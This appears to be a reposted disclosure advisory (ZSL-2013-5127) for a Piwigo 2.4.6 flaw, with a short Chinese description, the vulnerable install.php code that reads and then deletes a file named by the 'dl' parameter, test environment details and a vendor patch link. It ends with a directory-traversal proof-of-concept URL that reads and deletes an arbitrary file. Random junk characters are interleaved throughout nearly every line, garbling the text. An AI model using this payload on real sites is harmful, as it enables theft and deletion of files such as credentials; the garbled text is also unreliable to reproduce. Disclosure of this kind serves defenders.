Piwigo是用PHP编写的相册脚本。/ ]; @, m! d6 V: N
$ }" Y& v3 ]# \* S2 a' m
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
8 y1 u$ M( d# H9 q/ X% Z====================================================================
$ J& W8 C4 [( W: ~/install.php:
/ I2 ~& O: k# ~, k0 I/ A5 K-------------
' [- i& r! _8 ]& z- e- l- E8 j113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
& k; X/ a. C) m% U1 B, {114: {
, z/ }0 j9 C M7 Q" z# p115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
, D f8 S3 B* j! w& x( {4 j: P116: header('Cache-Control: no-cache, must-revalidate');; d% G5 M2 }" b+ X9 h3 n: Y/ k
117: header('Pragma: no-cache');
" n* z3 u" h9 m% M6 B/ C' Y118: header('Content-Disposition: attachment; filename="database.inc.php"');
( ~6 V ^6 D. Z/ ?% N/ [119: header('Content-Transfer-Encoding: binary');
, C7 H( t- U$ o. }. I; r/ y120: header('Content-Length: '.filesize($filename));+ M% E9 W3 c" ~# m
121: echo file_get_contents($filename);9 E8 r$ o, k& J. h( b- ~2 U
122: unlink($filename);
8 Z G0 k( x7 f123: exit();
; R6 R" J- Y+ L4 j2 v124: }
: W: f; u) A5 q0 H2 I====================================================================* V- z5 _0 U2 j0 h' z! x+ T
, {$ P ?( O5 y8 ]Tested on: Microsoft Windows 7 Ultimate SP1 (EN): b, U( U. T6 P* H! G L. a X: z
Apache 2.4.2 (Win32)' Z, C* _; f9 L2 l8 \* ]
PHP 5.4.4- [0 N5 E! t s5 k
MySQL 5.5.25a9 e) Y" K" t2 i. [: T1 L, v
6 e, k8 Q+ B: k+ W" C
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
0 N6 J5 c. Y" S) v5 T' J' V& R: [ @zeroscience& U( i& ?( H0 j
4 s2 n! Z' I9 R/ ~+ o7 Y2 hAdvisory ID: ZSL-2013-5127) a0 P/ i! y8 y! b/ o
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
! {* l, k/ g. A! I( D9 \Vendor Patch: http://piwigo.org/bugs/view.php?id=28437 O1 e! S' w& k
- \; n; J3 l4 g S* q" N
15.02.2013
5 c9 v% o7 F4 H, P/ {
$ Z" @# S( l8 I) @+ ~* y--$ I- I9 J7 J: ?
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
# V; l P! \& I! O( \# M: h W ) ~2 l$ g% |* H+ B k1 I
|